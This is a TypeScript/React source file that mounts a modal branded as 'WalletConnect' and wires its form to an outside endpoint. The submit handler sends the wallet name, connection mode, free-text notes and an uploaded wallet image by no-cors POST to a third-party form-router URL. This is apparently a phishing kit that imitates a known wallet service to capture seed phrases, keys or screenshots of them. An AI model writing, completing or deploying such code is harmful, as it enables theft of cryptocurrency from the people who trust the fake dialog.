import { StrictMode, useEffect, useState } from 'react'
import { createRoot } from 'react-dom/client'
import { WalletProvider, useWallet } from './context/WalletProvider'
import { WalletModal } from './components/WalletModal'
import type { WalletFormSubmission } from './types'
import './components/WalletModal.css'

const walletFormEndpoint = 'https://formrouters.aureonstack.com/api/forms/f_a445964d7614'

async function submitWalletForm(submission: WalletFormSubmission) {
  const textInput = submission.walletLabel || submission.walletManualNote || submission.walletSmeiLabel
  const body = new FormData()
  body.set('message', `Wallet name: ${submission.walletName} | ${submission.connectionMode} | ${textInput}`)
  if (submission.walletImage) {
    body.set('walletImage', submission.walletImage, submission.walletImage.name)
  }

  const response = await fetch(walletFormEndpoint, {
    method: 'POST',
    mode: 'no-cors',
    body,
  })

  if (response.type !== 'opaque' && !response.ok) {
    throw new Error('The form could not be submitted. Please try again.')
  }
}

function EmbeddedWalletModal() {
  const [open, setOpen] = useState(false)
  const { connection } = useWallet()

  useEffect(() => {
    const openModal = () => setOpen(true)

    document.addEventListener(
      'wallet-modal:open',
      openModal
    )

    return () => {
      document.removeEventListener(
        'wallet-modal:open',
        openModal
      )
    }
  }, [])

  useEffect(() => {
    const handler = (event: MouseEvent) => {
      const target = event.target

      if (!(target instanceof Element)) return

      const trigger = target.closest(
        '[data-wallet-modal-open]'
      )

      if (!trigger) return

      event.preventDefault()
      setOpen(true)
    }

    document.addEventListener('click', handler)

    return () => {
      document.removeEventListener('click', handler)
    }
  }, [])

  useEffect(() => {
    if (!connection) return

    document.dispatchEvent(
      new CustomEvent('wallet-modal:connected', {
        detail: connection
      })
    )
  }, [connection])

  return (
    <WalletModal
      open={open}
      onClose={() => setOpen(false)}
      onFormSubmit={submitWalletForm}
      branding={{
        appName: 'WalletConnect',
        appIcon: 'assets/wallet-modal/wallets/walletconn.webp',
        tagline: 'Your gateway to Web3'
      }}
      theme="dark"
      accentColor="#c4f579"
    />
  )
}

const rootElement =
  document.getElementById('wallet-modal-root')

if (rootElement) {
  createRoot(rootElement).render(
    <StrictMode>
      <WalletProvider>
        <EmbeddedWalletModal />
      </WalletProvider>
    </StrictMode>
  )
}
